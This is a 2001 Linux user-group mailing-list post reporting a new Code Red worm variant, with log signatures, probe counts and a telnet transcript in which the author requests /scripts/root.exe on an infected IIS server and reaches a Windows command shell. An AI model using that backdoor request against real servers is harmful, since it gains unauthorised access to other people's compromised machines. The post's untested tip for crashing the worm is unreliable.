[Gllug] New Code Red /default.ida?XXXXXXXXXXXX
Rev Simon Rumble
simon at rumble.net
Sun Aug 5 22:18:31 UTC 2001
There's a new variant of the Code Red worm around now. The most
noticable difference is the log entries are now:
/default.ida?XXXXXXXXXXXX...
Where previously they were:
/default.ida?NNNNNNNNNNNN...
See this site for more:
http://incidents.org
It appears to be spreading more rapidly. I've had more probes from
this one already than I have had for the original:
(taz-simon) [08:10:26] /home/rumble/www_logs$ zgrep "default.ida?X" * |wc -l
172
(taz-simon) [08:11:02] /home/rumble/www_logs$ zgrep "default.ida?N" * |wc -l
131
I've been told that you can cause a buffer overflow in the virus
itself, causing it to hang, by sending too much data to the virus.
Does anyone know if this is true? If it is true, simply linking
default.ida to something large, say your kernel source, could disable
it on some machines at least.
This new variant has a nice remotely exploitable backdoor once
installed. You can get to a shell through the web server, though
talking to it once you get there is beyond me:
telnet xxx.xxx.xxx.xx 80
Trying xxx.xxx.xxx.xx...
Connected to xxx.xxx.xxx.xx.
Escape character is '^]'.
GET /scripts/root.exe HTTP/1.0
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sun, 05 Aug 2001 21:59:25 GMT
Content-Type: application/octet-stream
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.
c:\inetpub\scripts>
--
Rev Simon Rumble <simon at rumble.net>
www.rumble.net
--
Gllug mailing list - Gllug at linux.co.uk
http://list.ftech.net/mailman/listinfo/gllug
More information about the GLLUG
mailing list